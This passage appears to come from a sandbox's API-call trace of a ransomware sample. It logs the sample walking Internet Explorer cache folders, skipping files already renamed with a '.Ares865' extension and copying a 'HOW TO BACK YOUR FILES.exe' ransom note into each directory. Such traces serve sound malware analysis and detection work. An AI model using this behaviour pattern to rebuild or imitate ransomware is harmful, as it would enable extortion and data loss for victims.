lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.864] CloseHandle (hObject=0x120) returned 1 [0110.864] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x69e1e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.864] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.864] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.864] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="9QH4S0GZ" | out: lpString1="9QH4S0GZ") returned="9QH4S0GZ" [0110.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2dd710 [0110.864] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.864] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ae7bb20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ae7bb20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ABV8L7MY", cAlternateFileName="")) returned 1 [0110.865] lstrcmpiW (lpString1="ABV8L7MY", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.865] lstrcmpiW (lpString1="ABV8L7MY", lpString2="aoldtz.exe") returned -1 [0110.865] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="ABV8L7MY" | out: lpString1="ABV8L7MY") returned="ABV8L7MY" [0110.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0110.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2dd7d8 [0110.865] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0110.865] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0110.865] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.865] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0110.865] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0110.865] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0110.865] lstrlenW (lpString="Ares865") returned 7 [0110.865] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.865] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d4f0280, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d4f0280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.865] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.865] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a8d46e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a8d46e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IKQEEPZR", cAlternateFileName="")) returned 1 [0110.865] lstrcmpiW (lpString1="IKQEEPZR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.865] lstrcmpiW (lpString1="IKQEEPZR", lpString2="aoldtz.exe") returned 1 [0110.865] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="IKQEEPZR" | out: lpString1="IKQEEPZR") returned="IKQEEPZR" [0110.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0110.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2dd8a0 [0110.866] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0110.866] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e44540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x54300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat.Ares865", cAlternateFileName="INDEXD~1.ARE")) returned 1 [0110.866] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.866] lstrcmpiW (lpString1="index.dat.Ares865", lpString2="aoldtz.exe") returned 1 [0110.866] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="index.dat.Ares865" | out: lpString1="index.dat.Ares865") returned="index.dat.Ares865" [0110.866] lstrlenW (lpString="index.dat.Ares865") returned 17 [0110.866] lstrlenW (lpString="Ares865") returned 7 [0110.866] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.866] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3c5820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a3c5820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YG1R61Z8", cAlternateFileName="")) returned 1 [0110.866] lstrcmpiW (lpString1="YG1R61Z8", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.866] lstrcmpiW (lpString1="YG1R61Z8", lpString2="aoldtz.exe") returned 1 [0110.866] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="YG1R61Z8" | out: lpString1="YG1R61Z8") returned="YG1R61Z8" [0110.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0110.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2dd968 [0110.866] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0110.866] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3c5820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a3c5820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YG1R61Z8", cAlternateFileName="")) returned 0 [0110.866] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.866] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0110.866] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" [0110.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8" [0110.867] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.867] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\content.ie5\\yg1r61z8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.867] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.868] GetLastError () returned 0x0 [0110.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.868] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.868] CloseHandle (hObject=0x120) returned 1 [0110.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3c5820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a3c5820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.868] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.868] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.869] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865" | out: lpString1="0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865") returned="0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865" [0110.869] lstrlenW (lpString="0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg.Ares865") returned 51 [0110.869] lstrlenW (lpString="Ares865") returned 7 [0110.869] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.869] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54a20810, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54a20810, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e90800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="26158[1].png.Ares865", cAlternateFileName="26158_~1.ARE")) returned 1 [0110.869] lstrcmpiW (lpString1="26158[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.869] lstrcmpiW (lpString1="26158[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.869] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="26158[1].png.Ares865" | out: lpString1="26158[1].png.Ares865") returned="26158[1].png.Ares865" [0110.869] lstrlenW (lpString="26158[1].png.Ares865") returned 20 [0110.869] lstrlenW (lpString="Ares865") returned 7 [0110.869] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.869] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458eefb0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458eefb0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69e90800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA42x3V[1].png.Ares865", cAlternateFileName="AA42X3~1.ARE")) returned 1 [0110.869] lstrcmpiW (lpString1="AA42x3V[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.869] lstrcmpiW (lpString1="AA42x3V[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.869] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA42x3V[1].png.Ares865" | out: lpString1="AA42x3V[1].png.Ares865") returned="AA42x3V[1].png.Ares865" [0110.869] lstrlenW (lpString="AA42x3V[1].png.Ares865") returned 22 [0110.869] lstrlenW (lpString="Ares865") returned 7 [0110.869] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.869] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5341bc90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5341bc90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e90800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA58NQj[1].png.Ares865", cAlternateFileName="AA58NQ~1.ARE")) returned 1 [0110.869] lstrcmpiW (lpString1="AA58NQj[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.870] lstrcmpiW (lpString1="AA58NQj[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.870] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA58NQj[1].png.Ares865" | out: lpString1="AA58NQj[1].png.Ares865") returned="AA58NQj[1].png.Ares865" [0110.870] lstrlenW (lpString="AA58NQj[1].png.Ares865") returned 22 [0110.870] lstrlenW (lpString="Ares865") returned 7 [0110.870] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.870] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x515e8570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x515e8570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69eb6960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA61Ofl[1].png.Ares865", cAlternateFileName="AA61OF~1.ARE")) returned 1 [0110.870] lstrcmpiW (lpString1="AA61Ofl[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.870] lstrcmpiW (lpString1="AA61Ofl[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.870] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA61Ofl[1].png.Ares865" | out: lpString1="AA61Ofl[1].png.Ares865") returned="AA61Ofl[1].png.Ares865" [0110.870] lstrlenW (lpString="AA61Ofl[1].png.Ares865") returned 22 [0110.870] lstrlenW (lpString="Ares865") returned 7 [0110.870] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.870] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45915110, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45915110, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69eb6960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA6SFRQ[2].png.Ares865", cAlternateFileName="AA6SFR~1.ARE")) returned 1 [0110.870] lstrcmpiW (lpString1="AA6SFRQ[2].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.870] lstrcmpiW (lpString1="AA6SFRQ[2].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.870] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA6SFRQ[2].png.Ares865" | out: lpString1="AA6SFRQ[2].png.Ares865") returned="AA6SFRQ[2].png.Ares865" [0110.870] lstrlenW (lpString="AA6SFRQ[2].png.Ares865") returned 22 [0110.870] lstrlenW (lpString="Ares865") returned 7 [0110.870] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.870] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4580a770, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4580a770, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69eb6960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAa1vhm[1].png.Ares865", cAlternateFileName="AAA1VH~1.ARE")) returned 1 [0110.871] lstrcmpiW (lpString1="AAa1vhm[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.871] lstrcmpiW (lpString1="AAa1vhm[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.871] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAa1vhm[1].png.Ares865" | out: lpString1="AAa1vhm[1].png.Ares865") returned="AAa1vhm[1].png.Ares865" [0110.871] lstrlenW (lpString="AAa1vhm[1].png.Ares865") returned 22 [0110.871] lstrlenW (lpString="Ares865") returned 7 [0110.871] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.871] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53846310, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53846310, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69edcac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAa1xJF[1].png.Ares865", cAlternateFileName="AAA1XJ~1.ARE")) returned 1 [0110.871] lstrcmpiW (lpString1="AAa1xJF[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.871] lstrcmpiW (lpString1="AAa1xJF[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.871] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAa1xJF[1].png.Ares865" | out: lpString1="AAa1xJF[1].png.Ares865") returned="AAa1xJF[1].png.Ares865" [0110.871] lstrlenW (lpString="AAa1xJF[1].png.Ares865") returned 22 [0110.871] lstrlenW (lpString="Ares865") returned 7 [0110.871] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.871] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5159c2b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5159c2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69edcac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xac0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAlG41q[1].jpg.Ares865", cAlternateFileName="AALG41~1.ARE")) returned 1 [0110.871] lstrcmpiW (lpString1="AAlG41q[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.871] lstrcmpiW (lpString1="AAlG41q[1].jpg.Ares865", lpString2="aoldtz.exe") returned -1 [0110.871] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAlG41q[1].jpg.Ares865" | out: lpString1="AAlG41q[1].jpg.Ares865") returned="AAlG41q[1].jpg.Ares865" [0110.871] lstrlenW (lpString="AAlG41q[1].jpg.Ares865") returned 22 [0110.871] lstrlenW (lpString="Ares865") returned 7 [0110.871] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.871] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45798350, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45798350, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x69edcac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAmin0Z[1].png.Ares865", cAlternateFileName="AAMIN0~1.ARE")) returned 1 [0110.872] lstrcmpiW (lpString1="AAmin0Z[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.872] lstrcmpiW (lpString1="AAmin0Z[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.872] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAmin0Z[1].png.Ares865" | out: lpString1="AAmin0Z[1].png.Ares865") returned="AAmin0Z[1].png.Ares865" [0110.872] lstrlenW (lpString="AAmin0Z[1].png.Ares865") returned 22 [0110.872] lstrlenW (lpString="Ares865") returned 7 [0110.872] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.872] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x533f5b30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533f5b30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69f02c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x39c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAnhRyj[1].jpg.Ares865", cAlternateFileName="AANHRY~1.ARE")) returned 1 [0110.872] lstrcmpiW (lpString1="AAnhRyj[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.872] lstrcmpiW (lpString1="AAnhRyj[1].jpg.Ares865", lpString2="aoldtz.exe") returned -1 [0110.872] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAnhRyj[1].jpg.Ares865" | out: lpString1="AAnhRyj[1].jpg.Ares865") returned="AAnhRyj[1].jpg.Ares865" [0110.872] lstrlenW (lpString="AAnhRyj[1].jpg.Ares865") returned 22 [0110.872] lstrlenW (lpString="Ares865") returned 7 [0110.872] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.872] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c161a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x64c161a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69f28d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865", cAlternateFileName="ACTIVI~1.ARE")) returned 1 [0110.872] lstrcmpiW (lpString1="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.872] lstrcmpiW (lpString1="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865", lpString2="aoldtz.exe") returned -1 [0110.872] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865" | out: lpString1="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865") returned="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865" [0110.872] lstrlenW (lpString="activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm.Ares865") returned 80 [0110.872] lstrlenW (lpString="Ares865") returned 7 [0110.872] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.872] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2eca30, ftCreationTime.dwHighDateTime=0x1d2faf2, 